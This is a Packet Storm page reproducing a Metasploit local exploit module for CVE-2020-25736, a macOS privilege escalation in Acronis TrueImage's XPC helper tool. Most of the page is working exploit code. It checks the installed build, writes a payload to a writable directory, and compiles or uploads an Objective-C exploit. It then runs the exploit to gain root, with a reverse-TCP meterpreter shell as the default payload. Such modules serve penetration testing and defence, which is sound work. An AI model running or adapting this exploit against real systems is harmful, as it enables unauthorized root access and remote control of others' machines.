Acronis TrueImage versions 2019 update 1 through 2021 update 1 are vulnerable to privilege escalation. The com.acronis.trueimagehelper helper tool does not perform any validation on connecting clients, which gives arbitrary clients the ability to execute functions provided by the helper tool with root privileges.
64e516f7e243343a09b0c147d3a167346d6cd74cc8c16dba1cb067a60cd06847##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Post::Process
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Acronis TrueImage XPC Privilege Escalation',
'Description' => %q{
Acronis TrueImage versions 2019 update 1 through 2021 update 1
are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
helper tool does not perform any validation on connecting clients,
which gives arbitrary clients the ability to execute functions provided
by the helper tool with `root` privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'Csaba Fitzl', # @theevilbit - Vulnerability Discovery
'Shelby Pace' # Metasploit Module and Objective-c code
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' => [
[ 'CVE', '2020-25736' ],
[ 'URL', 'https://kb.acronis.com/content/68061' ],
[ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]
],
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',
'WfsDelay' => 15
},
'DisclosureDate' => '2020-11-11',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
}
)
)
register_options([
OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),
OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),
OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])
])
end
def tmp_dir
datastore['WRITABLE_DIR'].to_s
end
def sys_shell
datastore['SHELL'].to_s
end
def compile
datastore['COMPILE']
end
def compile_on_target?
return false if compile == 'False'
if compile == 'Auto'
ret = cmd_exec('xcode-select -p')
return false if ret.include?('error: unable')
end
true
end
def exp_file_name
@exp_file_name ||= Rex::Text.rand_text_alpha(5..10)
end
def check
helper_location = '/Library/PrivilegedHelperTools'
helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]
plist = '/Applications/Acronis True Image.app/Contents/Info.plist'
unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }
return CheckCode::Safe
end
return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)
plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"
build_no = cmd_exec(plutil_cmd)
return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?
build_no = build_no.to_i
vprint_status("Found build #{build_no}")
return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610
CheckCode::Safe('Acronis version found is not vulnerable')
end
def exploit
payload_name = Rex::Text.rand_text_alpha(7)
@payload_path = "#{tmp_dir}/#{payload_name}"
print_status("Attempting to write payload at #{@payload_path}")
unless upload_and_chmodx(@payload_path, generate_payload_exe)
fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')
end
vprint_good("Successfully wrote payload at #{@payload_path}")
@pid = get_valid_pid
exp_bin_path = "#{tmp_dir}/#{exp_file_name}"
if compile_on_target?
exp_src = "#{exp_file_name}.m"
exp_path = "#{tmp_dir}/#{exp_src}"
compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"
unless write_file(exp_path, objective_c_code)
fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')
end
register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)
ret = cmd_exec(compile_cmd)
fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?
print_status("Successfully compiled #{exp_src}...Now executing payload")
else
print_status("Using pre-compiled exploit #{exp_bin_path}")
compiled_exploit = compiled_exp
unless upload_and_chmodx(exp_bin_path, compiled_exploit)
fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')
end
register_files_for_cleanup(exp_bin_path, @payload_path)
end
cmd_exec(exp_bin_path)
end
def objective_c_code
file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')
ERB.new(file_contents).result(binding)
rescue Errno::ENOENT
fail_with(Failure::NotFound, 'ERB payload file not found')
end
def compiled_exp
compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')
compiled.gsub!('/tmp/payload', @payload_path)
compiled.gsub!('/bin/zsh', sys_shell)
compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))
compiled
end
def get_valid_pid
procs = get_processes
return '1' if procs.empty?
len = procs.length
rand_proc = procs[rand(1...len)]
return '1' if rand_proc['pid'].to_s.blank?
rand_proc['pid'].to_s
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed